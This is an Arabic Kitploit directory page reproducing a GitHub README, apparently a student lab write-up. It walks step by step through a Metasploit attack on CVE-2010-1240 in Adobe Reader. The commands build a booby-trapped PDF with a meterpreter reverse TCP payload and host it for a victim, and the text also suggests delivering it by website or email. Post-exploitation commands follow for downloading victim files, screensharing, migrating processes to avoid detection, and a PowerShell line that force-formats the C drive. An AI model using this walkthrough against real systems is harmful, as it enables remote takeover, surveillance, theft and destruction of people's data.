Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Embedded-Backdoor-Connection — يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF الذي يبدو بريئًا إلى الهدف، والذي يحتوي في الواقع على حمولة مدمجة. تم نشر الثغرة علنًا باسم CVE-2010-1240. | Kitploit
أدوات/GitHubGitHub/omarothmann/embedded-backdoor-connection
أدوات التصيدتوليد الحمولةالاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF الذي يبدو بريئًا إلى الهدف، والذي يحتوي في الواقع على حمولة مدمجة. تم نشر الثغرة علنًا باسم CVE-2010-1240.

عرض المستودع
84منذ 4 سنواتلم تتم المراجعة بعد

اتصال باب خلفي مضمّن عبر ملفات PDF 😈

مقدَّم لكم من    

مقدمة

يوضّح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عبر إرسال ملف PDF يبدو بريئًا إلى الهدف، بينما يحتوي في الواقع على حمولة مضمّنة. تم الكشف عن هذا الاستغلال علنًا باسم CVE-2010-1240.

بمجرد فتح ملف PDF في Adobe Reader، فإن المستخدمين الذين نخدعهم للموافقة على النوافذ المنبثقة الأمنية سيتيحون لنا الحصول على جلسة meterpreter مرتبطة بأجهزتهم عبر اتصال TCP عكسي. وعندها، تكون جميع بياناتهم وما يقومون به الآن تحت مراقبتنا.

Hehe~Boi

قائمة البرامج/الأدوات

  • Metasploit
  • Adobe Reader <= 8.1.2

البيئة

Kali Linux         Windows 7 or 10         Adobe Reader        

  • جهاز المهاجم: Kali Linux الإصدار 2021.1
  • نظام التشغيل الهدف: Windows 10 (x86) أو Windows 7 (x86)
  • البرنامج المستهدف: Adobe Reader 8.1.2

الخطوات التفصيلية

أولاً، نقوم بتشغيل MSFconsole الذي يوفر لنا واجهة سطر أوامر للوصول إلى إطار عمل Metasploit.

root@kitploit:~
msfconsole

بعد ذلك، نبحث عن استغلال يطابق منصة Windows المستهدفة وبرنامج Adobe PDF Reader، حيث سيعرض قائمة كاملة بالاستغلالات التي يمكن استخدامها لاختراق جهاز Windows الخاص بالضحية واستغلال ثغرات Adobe PDF Reader.

root@kitploit:~
search type:exploit platform:windows adobe pdf

في هذا الاستغلال، نختار ونستخدم الوحدة "adobe_pdf_embedded_exe" بالأمر التالي لتحقيق هدف اختراق الضحية.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

يمكننا أيضًا التحقق من معلومات الاستغلال باستخدام الأمر "info" كما هو موضح أدناه:

root@kitploit:~
info

ثم نقوم بتعيين الحمولة لاستخدام اتصال TCP عكسي. كما نستخدم Meterpreter الذي يوفر غلافًا تفاعليًا يسهّل علينا استخدام جميع أنواع الوظائف عن طريق إدخال وتنفيذ الأكواد لاستكشاف جهاز الضحية.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

بعد ذلك، سنقوم بتعيين المضيف والمنفذ المستمعين. بالنسبة إلى LHOST، نحتاج إلى إدخال عنوان IP الخاص بجهاز المهاجم، وهو في هذه الحالة عنوان IP الخاص بجهاز Kali الخاص بنا (10.0.2.4)*.

  • *p.s.
    • يجب استخدام عنوان IP الخاص بجهاز Kali الخاص بك
    • يمكنك استخدام رقم منفذ مختلف

أما بالنسبة إلى LPORT، فلدينا حرية تعيين رقم منفذ غير شائع الاستخدام.

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

بعد ذلك، سنقوم بتعيين ملف الإدخال كأساس لملف PDF باستخدام علامة INFILENAME*. ثم سنقوم بتعيين اسم الملف إلى شيء يجذب اهتمام الضحية لفتح ملف PDF الخبيث.

  • *p.s.
    • يجب التأكد من مسار ملف PDF الخاص بك
    • يمكنك استخدام اسم ملف مختلف
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

يمكننا مراجعة الخيارات مرة أخرى قبل إدخال الأمر "exploit" لتوليد الحمولة مع ملف PDF.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

بمجرد الانتهاء من توليد ملف PDF، سنقوم بنقل الملف إلى /var/www/html وهو دليل جهاز Kali الخاص بنا لاستضافة خادم تطبيق الويب ليتمكن الضحية من تنزيل ملف PDF لاحقًا.

  • Note:
    • إذا قمت بتعيين اسم ملف مختلف، فتأكد من نسخ المسار الصحيح بدلاً من ذلك!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

بعد ذلك، لإعداد المستمع الخاص بنا، سنستخدم "exploit/multi/handler". مرة أخرى، سنقوم بتعيين الحمولة وLHOST وLPORT بما يتوافق مع ما حددناه عند توليد ملف PDF الخبيث. ثم سنقوم بتشغيل الحمولة.

  • Note:
    • LHOST: يرجى الانتباه إلى عنوان IP الخاص بجهاز Kali الخاص بك
    • LPORT: إذا قمت بتعيين رقم منفذ مختلف، فتأكد من إدخال الرقم بشكل صحيح
    • show info أو show options أمر اختياري للتشغيل.
      • تشغيله فقط للتحقق مما قمت بتعيينه للتو
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

في طرفية أخرى، نتحقق من حالة خادم Apache للتأكد من أنه يعمل لاستضافة ملف PDF الخاص بنا في /var/www/html ليتمكن الضحية من تنزيل الملف.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

على جهاز Windows، افتح أي متصفح مثل Chrome واكتب عنوان IP الخاص بـ Kali (10.0.2.4)* للوصول إلى خادم تطبيق الويب الخاص بجهاز Kali.

*Note: يرجى الانتباه إلى عنوان IP الخاص بجهاز Kali الخاص بك

بعد ذلك، قم بمحاكاة قيام مستخدم بحفظ ملف PDF المقصود.

بمجرد فتح الضحية للملف في Adobe Reader 8.1.2 والموافقة على رسائل الأمان المنبثقة، يمكننا عندئذٍ ملاحظة وجود جلسة جديدة متصلة عبر اتصال TCP عكسي على جهاز Kali الخاص بنا.

في السيناريو الواقعي، سنقوم بإعداد موقع ويب يحوي ملف PDF ذا الحمولة المضمّنة ليتيح للضحية تنزيل الملف أو إرفاقه عبر البريد الإلكتروني.


نتيجة الاستغلال

بعد ذلك، يمكننا الوصول عن بُعد إلى جهاز الضحية ثم تنفيذ المزيد من السلوكيات الخبيثة التي نريدها في جلسة meterpreter.

لعرض قائمة بالأشياء التي يمكننا القيام بها

root@kitploit:~
help

عرض الدليل الحالي

root@kitploit:~
pwd

سرد الملفات الموجودة في ذلك الدليل

root@kitploit:~
ls

تنزيل مجلد أو ملف من جهاز الضحية

على سبيل المثال، إذا كان هناك ملف باسم password.txt، يمكننا إصدار الأمر download password.txt

root@kitploit:~
download [folder name | filename with extension]

إنشاء ملف على جهاز الضحية

بالطبع، يمكننا كتابة سكربت خبيث (زرع باب خلفي) لإبقاء اتصالنا بجهاز Windows إذا كنا أشرارًا حقًا! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

التفاعل مع Windows

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

إضافي

ومع ذلك، يمكن للمهاجم تقليل الشكوك عن طريق ترحيل عملية meterpreter إلى عملية مختلفة باستخدام وحدة migrate في جلسة meterpreter.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

هنا، سيقوم تلقائيًا بإنشاء عملية جديدة في جهاز الضحية ليرحّل نفسه إليها. وعندها يمكن للضحية حذف ملف PDF المصاب، دون أن يدرك تمامًا أن العملية انتقلت بالفعل إلى مكان آخر.

يمكن للمهاجم أيضًا إنشاء سكربت خبيث على الجهاز المستهدف باستخدام موجه الأوامر (cmd) أو PowerShell، وهو قادر على تعطيل نظام التشغيل بالكامل ومنعه من العمل بشكل صحيح.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

فيديو توضيحي

عرض توضيحي

تنزيل الأداة